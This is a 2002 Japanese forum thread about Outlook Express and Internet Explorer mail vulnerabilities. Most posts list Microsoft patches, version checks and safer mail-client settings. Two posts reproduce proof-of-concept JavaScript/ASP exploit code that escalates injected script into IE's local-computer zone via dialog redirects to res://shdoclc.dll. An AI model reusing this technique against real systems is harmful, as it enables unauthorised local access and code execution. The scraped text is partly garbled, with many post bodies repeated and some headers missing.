OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
1 :スレ立て代理人:
・IEの脆弱性とその対策
(最近ではKlez、以前はnimdaやBadtransウイルスの蔓延の一因になった)
・IEコンポーネントを使用してHTMLメールを表示するメーラなどの問題点と対策
(OutlookExpressやBecky!など)
・ウイルスに感染しない、蔓延させないためのよりよいメーラの使用方法
等を建設的に話し合いましょう。
各自のお使いのメーラーの推奨設定、使用方法、アンチウイルスソフトとの
連携方法なども提示していただけると非常にありがたいです。
このスレッドは、「Klez.E、Kleaz系スレッド Part2」からの派生スレです。
http://pc.2ch.net/test/read.cgi/sec/1021137509/
現時点の最新OE/IEバージョン・パッチ情報は>>2-10、>>2-50
関連スレッド:
「IE5・5と6・0、ネット閲覧ソフトに欠陥」
http://pc.2ch.net/test/read.cgi/sec/1005605775/
(最近ではKlez、以前はnimdaやBadtransウイルスの蔓延の一因になった)
・IEコンポーネントを使用してHTMLメールを表示するメーラなどの問題点と対策
(OutlookExpressやBecky!など)
・ウイルスに感染しない、蔓延させないためのよりよいメーラの使用方法
等を建設的に話し合いましょう。
各自のお使いのメーラーの推奨設定、使用方法、アンチウイルスソフトとの
連携方法なども提示していただけると非常にありがたいです。
このスレッドは、「Klez.E、Kleaz系スレッド Part2」からの派生スレです。
http://pc.2ch.net/test/read.cgi/sec/1021137509/
現時点の最新OE/IEバージョン・パッチ情報は>>2-10、>>2-50
関連スレッド:
「IE5・5と6・0、ネット閲覧ソフトに欠陥」
http://pc.2ch.net/test/read.cgi/sec/1005605775/
|
|
|
2 :名無しさん@お腹いっぱい。:02/05/14 17:11
<<メールに関連するIEの脆弱性と、対策方法について>>
HTMLメールを表示するために、IEコンポーネントを使用するメーラー
(有名どころではOutlook Expressなど)は、メールを開封、もしくは
プレビュー表示させただけで添付ファイルが実行されてしまうという
脆弱性が存在します。
(この脆弱性を利用して、感染被害を拡大させるウイルスが多数存在し、
現在でも世界中に蔓延しています。)
詳細は以下のMicrosoftのリンクを参照してください。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
【対策が必要なソフト】
プレビューしただけで感染する恐れがあるソフト:
Windows95/98/98SE/ME/NT4/2000で、OutlookExpressを使用している方、
OutlookExpress以外でも、HTMLメール表示にIEコンポーネントを使用する
メーラーを使用している方で
・IE4を使っている人
・IE5.01、IE5.5で、SP2(サービスパック2)を当てていない場合
・IE6を、98,98SE,ME,NT4で最小インストールしたPC
バージョンは、ヘルプ→バージョン情報で確認できます。わからない人は下記を
参照してください。
・IEのバージョン確認方法
http://www2.ocn.ne.jp/~circle/IE_version.htm
HTMLメールを表示するために、IEコンポーネントを使用するメーラー
(有名どころではOutlook Expressなど)は、メールを開封、もしくは
プレビュー表示させただけで添付ファイルが実行されてしまうという
脆弱性が存在します。
(この脆弱性を利用して、感染被害を拡大させるウイルスが多数存在し、
現在でも世界中に蔓延しています。)
詳細は以下のMicrosoftのリンクを参照してください。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
【対策が必要なソフト】
プレビューしただけで感染する恐れがあるソフト:
Windows95/98/98SE/ME/NT4/2000で、OutlookExpressを使用している方、
OutlookExpress以外でも、HTMLメール表示にIEコンポーネントを使用する
メーラーを使用している方で
・IE4を使っている人
・IE5.01、IE5.5で、SP2(サービスパック2)を当てていない場合
・IE6を、98,98SE,ME,NT4で最小インストールしたPC
バージョンは、ヘルプ→バージョン情報で確認できます。わからない人は下記を
参照してください。
・IEのバージョン確認方法
http://www2.ocn.ne.jp/~circle/IE_version.htm
3 :名無しさん@お腹いっぱい。:02/05/14 17:12
【現時点で対策方法】
前述の《MS01-020》を含め、現時点までに明らかになっている脆弱性への
対策方法は以下の通りです。
・IE6.0(最小インストール以外)を使用している方
→ 《MS02-009》+《MS02-015》を適用してください。
(OSがXP、又は2000の方は最小インストールでも上記パッチのみでOK)
・IE6.0(最小インストール)を使用している方
→ フルインストール、又は標準インストール後、《MS02-009》+《MS02-015》を適用してください。
・IE5.5(サービスパックなし、またはSP1)を使用している方
→ 《IE5.5 SP2》+《MS02-009》+《MS02-015》の適用
・IE5.01を使用している方(OSが2000、NT)
→ 《IE5.01 SP2》+《MS02-009》+《MS02-015》の適用
・IE5.01を使用している方(OSがWin98、Me)
→ 《IE5.01 SP2》+《MS02-009》の適用
※Win98、Me向けのIE5.01に関するサポートは終了したため、《MS02-015》
パッチはありません。今後のセキュリティ対策のために、IE5.5、もしくは
IE6への移行を推奨します。
前述の《MS01-020》を含め、現時点までに明らかになっている脆弱性への
対策方法は以下の通りです。
・IE6.0(最小インストール以外)を使用している方
→ 《MS02-009》+《MS02-015》を適用してください。
(OSがXP、又は2000の方は最小インストールでも上記パッチのみでOK)
・IE6.0(最小インストール)を使用している方
→ フルインストール、又は標準インストール後、《MS02-009》+《MS02-015》を適用してください。
・IE5.5(サービスパックなし、またはSP1)を使用している方
→ 《IE5.5 SP2》+《MS02-009》+《MS02-015》の適用
・IE5.01を使用している方(OSが2000、NT)
→ 《IE5.01 SP2》+《MS02-009》+《MS02-015》の適用
・IE5.01を使用している方(OSがWin98、Me)
→ 《IE5.01 SP2》+《MS02-009》の適用
※Win98、Me向けのIE5.01に関するサポートは終了したため、《MS02-015》
パッチはありません。今後のセキュリティ対策のために、IE5.5、もしくは
IE6への移行を推奨します。
4 :名無しさん@お腹いっぱい。:02/05/14 17:12
〜 サービスパック 〜
《IE5.5 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=32082
《IE5.01 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
〜 修正パッチ 〜(ダウンロード先のリストから Japanese Language Version を選択)
《MS02-009》Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る
http://www.microsoft.com/windows/ie/downloads/critical/q318089/default.asp
《MS02-015》2002 年 3 月 28 日 Internet Explorer 用の累積的な修正プログラム
http://www.microsoft.com/windows/ie/downloads/critical/Q319182/default.asp
【対策後の確認】
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-009》を適用した場合は「q318089」が表示されていればOK.
(※《MS02-015》の適用分は表示されません)
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6 (Windows XP)
のいずれかならばOK。
《IE5.5 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=32082
《IE5.01 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
〜 修正パッチ 〜(ダウンロード先のリストから Japanese Language Version を選択)
《MS02-009》Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る
http://www.microsoft.com/windows/ie/downloads/critical/q318089/default.asp
《MS02-015》2002 年 3 月 28 日 Internet Explorer 用の累積的な修正プログラム
http://www.microsoft.com/windows/ie/downloads/critical/Q319182/default.asp
【対策後の確認】
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-009》を適用した場合は「q318089」が表示されていればOK.
(※《MS02-015》の適用分は表示されません)
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6 (Windows XP)
のいずれかならばOK。
5 :名無しさん@お腹いっぱい。:02/05/14 17:19
だから、OEは使うなって言ってるだろうが!
6 :名無しさん@お腹いっぱい。:02/05/14 17:25
MSN チャット コントロールの未チェッ クのバッファによりコードが実行される (Q321661) (MS02-022)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-022.asp
MSN Messengerに深刻なホール,すべてのIEユーザーは対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-022.asp
MSN Messengerに深刻なホール,すべてのIEユーザーは対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
7 :名無しさん@お腹いっぱい。:02/05/14 17:26
>>5
それだと、OEじゃなきゃ問題ないみたいように読めます。
私はBecky!ユーザーですが、Becky!もちゃんと対策しないと駄目
なんですよ。リムアーツのサイトのトップにも書いてあります。
Becky!の設定:
「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」
のチェックをはずしていれば、HTMLのメールが添付として扱われますので、
それをダブルクリックしない限り感染することはありません。
それがダブルクリックする人もいるんですよね…「W32.Klez.E removal tools」
なんて件名で来たりすると。
それだと、OEじゃなきゃ問題ないみたいように読めます。
私はBecky!ユーザーですが、Becky!もちゃんと対策しないと駄目
なんですよ。リムアーツのサイトのトップにも書いてあります。
Becky!の設定:
「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」
のチェックをはずしていれば、HTMLのメールが添付として扱われますので、
それをダブルクリックしない限り感染することはありません。
それがダブルクリックする人もいるんですよね…「W32.Klez.E removal tools」
なんて件名で来たりすると。
8 : :02/05/14 17:27
>>4
【 訂正 】
【対策後の確認】
・《MS02-015》を適用した場合は、IEバージョン画面の「更新バージョン」の行に
「q319182」が表示されていればOK.
※《MS02-009》の適用分は表示されません
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6
のいずれかならばOK。
【 訂正 】
【対策後の確認】
・《MS02-015》を適用した場合は、IEバージョン画面の「更新バージョン」の行に
「q319182」が表示されていればOK.
※《MS02-009》の適用分は表示されません
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6
のいずれかならばOK。
9 : :02/05/14 17:29
XMLHTTP コントロールにより、ローカルファイルにアクセスすることができる (MS02- 008)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-008.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-008.asp
10 : :02/05/14 17:31
マイクロソフト セキュリティ情報一覧(IE関連)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp?sel_id=032&info=all&opttop=30
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp?sel_id=032&info=all&opttop=30
11 :名無しさん@お腹いっぱい。:02/05/14 17:42
OutlookExpressでメールを自動的にプレビューさせない方法
1.メニューバーの[表示]を押します。
2.[レイアウト]を押します。
3.「プレビューウインドウ」のプレビューウインドウを表示するの
チェックボックスを外します。
4.[適用]ボタンを押してOKを押します。
これでメールはプレビューされません。
しかしウイルスから感染しなくなったのではないのでご注意ください。
1.メニューバーの[表示]を押します。
2.[レイアウト]を押します。
3.「プレビューウインドウ」のプレビューウインドウを表示するの
チェックボックスを外します。
4.[適用]ボタンを押してOKを押します。
これでメールはプレビューされません。
しかしウイルスから感染しなくなったのではないのでご注意ください。
12 :名無しさん@お腹いっぱい。:02/05/14 17:45
>>ALL
オツ。
これでOEへの誤解も大方解けるというものじゃ。
また、初心者への啓蒙にも多いに作用することであろう。万歳!!
オツ。
これでOEへの誤解も大方解けるというものじゃ。
また、初心者への啓蒙にも多いに作用することであろう。万歳!!
13 :名無しさん@お腹いっぱい。:02/05/14 17:50
>>5のように根拠を示さないのは荒らしですので放置おながいします。
14 : :02/05/14 17:53
メールの添付ファイルの取り扱い5つの心得(IPAセキュリティセンター)
http://www.ipa.go.jp/security/antivirus/attach5.html
http://www.ipa.go.jp/security/antivirus/attach5.html
15 : :02/05/14 17:55
ブラウザのセキュリティを設定をする(IPAセキュリティセンター)
http://www.ipa.go.jp/security/ciadr/browser.html
http://www.ipa.go.jp/security/ciadr/browser.html
16 : :02/05/14 17:57
ホームユーザー向け セキュリティ対策 早わかりガイド(マイクロソフト)
http://microsoft.com/japan/enable/products/security/
http://microsoft.com/japan/enable/products/security/
17 :名無しさん@お腹いっぱい。:02/05/14 19:29
O.Eを使っててもパッチ当てて、AVソフトを入れとけばメール受信時
検出してくれるのでウィルスの侵入は防げる。
(最新パターンファイルを入れるのが遅かったらアウトだが)
そんなに心配しなくてもいいのでは?
検出してくれるのでウィルスの侵入は防げる。
(最新パターンファイルを入れるのが遅かったらアウトだが)
そんなに心配しなくてもいいのでは?
18 :cheshire-cat:02/05/14 19:48
19 :名無しさん@お腹いっぱい。:02/05/15 02:00
>>17 チミ専用に調合された特製トロイだったらどうしる?
20 :名無しさん@お腹いっぱい。:02/05/15 02:07
>>19
何を言いたいのかさっぱり不明なわけだが。
何を言いたいのかさっぱり不明なわけだが。
21 :名無しさん@お腹いっぱい。:02/05/15 02:52
今日、Klez にやられた知人のPC復旧を手伝ったんだけど、
それでも頑なにOEを使い続けようとするんで、
その理由を聞いてみたところ、
とにかく、最大シェアを根拠に、MS純正=ブランドであって、
それ以外の 3rd Party のメーラーを使うのはダサいってことらしい。
もしかして、こんな意識を持ってる初心者も多いのかもと、
ちょっと、盲点というか、意表を衝かれた感じだった。
それでも頑なにOEを使い続けようとするんで、
その理由を聞いてみたところ、
とにかく、最大シェアを根拠に、MS純正=ブランドであって、
それ以外の 3rd Party のメーラーを使うのはダサいってことらしい。
もしかして、こんな意識を持ってる初心者も多いのかもと、
ちょっと、盲点というか、意表を衝かれた感じだった。
22 :名無しさん@お腹いっぱい。:02/05/15 10:31
WordはMSのだからいいワープロのはずだ、と信じている初心者と
似たようなもんじゃないかな。頑ななのにはこのテが多いな。
まあ、なんか入っているから、無料だからって感じで使っているケースの方が
多いかとは思うけど。こっちは他のを紹介されると動く可能性も。
似たようなもんじゃないかな。頑ななのにはこのテが多いな。
まあ、なんか入っているから、無料だからって感じで使っているケースの方が
多いかとは思うけど。こっちは他のを紹介されると動く可能性も。
23 :名無しさん@お腹いっぱい。:02/05/15 12:05
「特別企画 Microsoftのメールとつきあう2番目に冴えたやり方」
http://www.watch.impress.co.jp/pc/docs/article/980401/41/mail/mail.htm
上のURLはちょうど4年前の「PCうおっち」のコラムです。
「PCうおっち」自体は年に一度の冗談企画なのですが、このコラムの中身は
全然冗談ではなく、当時のMSご謹製メーラーの実情と、問題点をよく書いていたと思います。
多分、このコラムが書かれた辺りですでにインターネットを使っていた
(もはや古株と言われてしまうかもしれない。もちろん私も(w )皆さんの
「MSと、MSご謹製メーラーに対する不信感」は、あの頃までに確立してしまっ
てなかなかぬぐい去れないんだろうなあ、と思っています。
だから今のOE批判者の意見には、一部同意してしまうところもあったり。
そういえば当時会社で使えと強制された、MSご謹製の「Internet Mail & News」
は本当にひでぇ代物で、それを元に作られたOutlookExpressは、それに比べる
と全然まともなメーラーだなあと感じてます。(あとは初期設定の件とMessage-ID
の件をなんとかしてもらえれば)
以上、年寄りの長文デスタ。
http://www.watch.impress.co.jp/pc/docs/article/980401/41/mail/mail.htm
上のURLはちょうど4年前の「PCうおっち」のコラムです。
「PCうおっち」自体は年に一度の冗談企画なのですが、このコラムの中身は
全然冗談ではなく、当時のMSご謹製メーラーの実情と、問題点をよく書いていたと思います。
多分、このコラムが書かれた辺りですでにインターネットを使っていた
(もはや古株と言われてしまうかもしれない。もちろん私も(w )皆さんの
「MSと、MSご謹製メーラーに対する不信感」は、あの頃までに確立してしまっ
てなかなかぬぐい去れないんだろうなあ、と思っています。
だから今のOE批判者の意見には、一部同意してしまうところもあったり。
そういえば当時会社で使えと強制された、MSご謹製の「Internet Mail & News」
は本当にひでぇ代物で、それを元に作られたOutlookExpressは、それに比べる
と全然まともなメーラーだなあと感じてます。(あとは初期設定の件とMessage-ID
の件をなんとかしてもらえれば)
以上、年寄りの長文デスタ。
24 :名無しさん@お腹いっぱい。:02/05/15 13:28
25 :名無しさん@お腹いっぱい。:02/05/15 19:09
26 :名無しさん@お腹いっぱい。:02/05/15 19:37
>>25
パッチも知らないような初心者がここに来ることはないだろうよ。
パッチも知らないような初心者がここに来ることはないだろうよ。
27 :名無しさん@お腹いっぱい。:02/05/15 19:52
>>25
PC初心者板だとそうかもね。
PC初心者板だとそうかもね。
28 :名無しさん@お腹いっぱい。:02/05/15 20:08
29 :名無しさん@お腹いっぱい。:02/05/16 09:06
誰かに「パッチ当てろゴルァ」っていうときに、まとまったテンプレがあると楽という
程度でよろしいんじゃないですか。意外とまとまった情報はないし。
程度でよろしいんじゃないですか。意外とまとまった情報はないし。
30 : :02/05/16 11:42
「MS02-023 : 2002年5月15日 Internet Explorer 用の累積的な修正プログラ
ム (Q321232)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023ov.asp
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-015 : 2002 年 3 月 28 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・Internet Explorer 6
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.5 Service Pack 1
・Internet Explorer 5.01 Service Pack 2 (Windows 2000 、
Windows NT4.0 に組み込まれているもののみ)
修正プログラム
==============
・Internet Explorer 6
http://download.microsoft.com/download/IE60/secpac27/6/W98NT42KMeXP/JA/q321232.exe
・Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/secpac27/5.5_sp2/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/secpac27/5.5_sp1/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.01 SP2
http://download.microsoft.com/download/ie501sp2/secpac27/5.01_sp2/NT45/JA/q321232.exe
ム (Q321232)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023ov.asp
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-015 : 2002 年 3 月 28 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・Internet Explorer 6
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.5 Service Pack 1
・Internet Explorer 5.01 Service Pack 2 (Windows 2000 、
Windows NT4.0 に組み込まれているもののみ)
修正プログラム
==============
・Internet Explorer 6
http://download.microsoft.com/download/IE60/secpac27/6/W98NT42KMeXP/JA/q321232.exe
・Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/secpac27/5.5_sp2/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/secpac27/5.5_sp1/W98NT42KMe/JA/q321232.exe
・Internet Explorer 5.01 SP2
http://download.microsoft.com/download/ie501sp2/secpac27/5.01_sp2/NT45/JA/q321232.exe
31 : :02/05/16 11:42
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザー
による以下の攻撃を防ぐことができます。
(高) クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(高) ローカルコンピュータ上のファイルを読み取ることができる問題です。
しかし、この問題はファイルの場所を事前に知られていない限り悪用されるこ
とはありません。また、ファイルの削除、変更などが行われることも
ありません。
(高) 本来読み取ることができない、クッキー情報が読み取られる問題です。
(中) ファイルをダウンロード際の処理に問題があったために、スクリプトや
意図しないファイル実行される可能性がある問題です。
(低) Internet Explorer のゾーン判定を回避して、スクリプトが
イントラネットゾーンまたは、信頼されたゾーンで実行される
可能性がある 2 つの問題があります。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を利用した悪影響を受ける
ことがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした
悪意のあるプログラムから行われることがあります。
・ディスク上の任意のファイルが読み取られます。しかし、削除、変更が
行われることはありません。
・意図しないスクリプトが実行されます。
・アプリケーションが実行されます。 (通常悪意のあるアプリケーション
であり、ハードディスクのフォーマットなどが実行されてしまいます)
日本語による詳細については、ただいま準備中です。
====
この修正プログラムをインストールすることにより、悪意のあるユーザー
による以下の攻撃を防ぐことができます。
(高) クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(高) ローカルコンピュータ上のファイルを読み取ることができる問題です。
しかし、この問題はファイルの場所を事前に知られていない限り悪用されるこ
とはありません。また、ファイルの削除、変更などが行われることも
ありません。
(高) 本来読み取ることができない、クッキー情報が読み取られる問題です。
(中) ファイルをダウンロード際の処理に問題があったために、スクリプトや
意図しないファイル実行される可能性がある問題です。
(低) Internet Explorer のゾーン判定を回避して、スクリプトが
イントラネットゾーンまたは、信頼されたゾーンで実行される
可能性がある 2 つの問題があります。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を利用した悪影響を受ける
ことがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした
悪意のあるプログラムから行われることがあります。
・ディスク上の任意のファイルが読み取られます。しかし、削除、変更が
行われることはありません。
・意図しないスクリプトが実行されます。
・アプリケーションが実行されます。 (通常悪意のあるアプリケーション
であり、ハードディスクのフォーマットなどが実行されてしまいます)
日本語による詳細については、ただいま準備中です。
32 : :02/05/16 11:49
【対策後の確認】
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-023》を適用した場合は「q321232」が表示されていればOK
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-023》を適用した場合は「q321232」が表示されていればOK
33 :名無しさん@お腹いっぱい。:02/05/16 12:04
>>30
おつです!当ててきます。
おつです!当ててきます。
34 :名無しさん@お腹いっぱい。:02/05/16 14:36
人柱さまのレポートきぼんぬ
35 :名無しさん@お腹いっぱい。:02/05/16 14:41
>28
残念ながら想像できないことが起きています。
こうして2ちゃんの良い板がまたひとつ死んでいく。
残念ながら想像できないことが起きています。
こうして2ちゃんの良い板がまたひとつ死んでいく。
36 :名無しさん@お腹いっぱい。:02/05/16 14:53
>>35 もしかしてセキュ板にDQNが誘導されてきている?
37 :名無しさん@お腹いっぱい。:02/05/16 14:54
>>35
2ちゃんに良い板なんかあるのか?
2ちゃんに良い板なんかあるのか?
38 :名無しさん@お腹いっぱい。:02/05/16 15:15
>>37
ワラタ
ワラタ
39 :名無しさん@お腹いっぱい。:02/05/16 15:15
40 :名無しさん@お腹いっぱい。:02/05/16 15:18
q321232は「Win2000 SP2+SR1」で問題無しでした。
41 :名無しさん@お腹いっぱい。:02/05/16 15:49
同じくWin2000 SP2+SR1で今のところ大丈夫
Win ME + IE6にq321232当てたら再起動選択時にブルースクリーンに。
その後確認したら、パッチは無事当たっていた模様。
その後確認したら、パッチは無事当たっていた模様。
43 :名無しさん@お腹いっぱい。:02/05/16 19:33
Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》な環境です。
《MS02-023》、無事適用できました。
《MS02-023》、無事適用できました。
var site = window.parent.dialogArguments.url;
function printSite()
{
document.write( site);
}
<script>
var sCode = '<'+'script>alert("This is running from: " +
location.href);top.close()</'+'script>';
window.showModalDialog("redirect.asp", {url:sCode})
</script>
<%@Language=Jscript%><%
Response.Redirect("res://shdoclc.dll/policyerror.htm");
%>
function printSite()
{
document.write( site);
}
<script>
var sCode = '<'+'script>alert("This is running from: " +
location.href);top.close()</'+'script>';
window.showModalDialog("redirect.asp", {url:sCode})
</script>
<%@Language=Jscript%><%
Response.Redirect("res://shdoclc.dll/policyerror.htm");
%>
45 : :02/05/16 19:53
<script language="jscript">
// HTML to be injected (will run in the "My Computer" zone)
var sHTML="<b>We're in!</b>";
// Object to return from tags("link"), must be a function because they use
// objects(i) instead of objects[i], VB style collection access.
function oExploit(iSec) {
����return {
��������// Satisfy line 201
��������rel:"stylesheet",
��������// Satisfy line 204
��������readyState:"exploit",
��������// Exploit line 205
��������href:sHTML
����};
}
// A length property so it will enter the loop
oExploit.length=1;
// A fake window object, so no errors will be raised during the process,
// the custom "tags" method will return an empty array for any element
// other than our target (<link>), in which case it will return the oExploit
// object above.
var oSecurity={
����document:{
��������all:{
������������tags:function (sTag) {
����������������return sTag=="link" ? oExploit : [];
������������}
��������}
����}
}
// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
// and oSecurity (fake window) is sent as the dialog argument.
showModelessDialog("getFile.asp",oSecurity);
</script>
// HTML to be injected (will run in the "My Computer" zone)
var sHTML="<b>We're in!</b>";
// Object to return from tags("link"), must be a function because they use
// objects(i) instead of objects[i], VB style collection access.
function oExploit(iSec) {
����return {
��������// Satisfy line 201
��������rel:"stylesheet",
��������// Satisfy line 204
��������readyState:"exploit",
��������// Exploit line 205
��������href:sHTML
����};
}
// A length property so it will enter the loop
oExploit.length=1;
// A fake window object, so no errors will be raised during the process,
// the custom "tags" method will return an empty array for any element
// other than our target (<link>), in which case it will return the oExploit
// object above.
var oSecurity={
����document:{
��������all:{
������������tags:function (sTag) {
����������������return sTag=="link" ? oExploit : [];
������������}
��������}
����}
}
// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
// and oSecurity (fake window) is sent as the dialog argument.
showModelessDialog("getFile.asp",oSecurity);
</script>
46 :名無しさん@お腹いっぱい。:02/05/16 21:02
Win98SE IE5.5SP2です。無事当たりました。
>>40-41 「Win2000 SP2+SR1」で問題無
>>42 Win ME + IE6にq321232あてるとブルースクリーン。パッチはあたる
>>43 Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》問題なし
>>47 Win/ME IE6.0パッチあてた後に電源オフ。その後電源オンでスキャンディスクが走った。急いでたので電源オフが半端だったかも。
>>42 Win ME + IE6にq321232あてるとブルースクリーン。パッチはあたる
>>43 Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》問題なし
>>47 Win/ME IE6.0パッチあてた後に電源オフ。その後電源オンでスキャンディスクが走った。急いでたので電源オフが半端だったかも。
Win2000 SP2+SR1(IE6)で問題なしでした。追記します。
49 :名無しさん@お腹いっぱい。:02/05/17 01:43
winMeでIE6すが、q321232問題なしでしたよ
50 :名無しさん@お腹いっぱい。:02/05/17 03:00
私もWinMe IE6でq321232出来ました。ところでVB2002常駐のままで
実行してよかったのかなァ
初心者的疑問かも。
実行してよかったのかなァ
初心者的疑問かも。
Win98 IE5.5SP2でし。q321232問題なし
53 :Internet Explorer最新バージョンまとめ:02/05/18 08:37
・以下のバージョンでかつq318089とQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・q318089がついていなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
の修正パッチを当てる。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
の修正パッチを当てる。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・q318089がついていなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
の修正パッチを当てる。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
の修正パッチを当てる。
54 :訂正:IE最新バージョン:02/05/18 08:40
・以下のバージョンでかつQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-023.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
